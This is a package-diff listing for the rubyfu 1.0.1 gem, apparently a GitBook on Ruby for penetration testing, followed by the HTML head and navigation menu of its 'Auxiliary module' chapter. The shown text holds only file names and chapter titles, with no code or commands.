rubyfu 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html ADDED
@@ -0,0 +1,1870 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>Auxiliary module | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x5__exploitation_kung_fu/exploit_module.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x5__exploitation_kung_fu/metasploit.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="5.2.1"
67
+ data-chapter-title="Auxiliary module"
68
+ data-filepath="module_0x5__exploitation_kung_fu/auxiliary_module.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
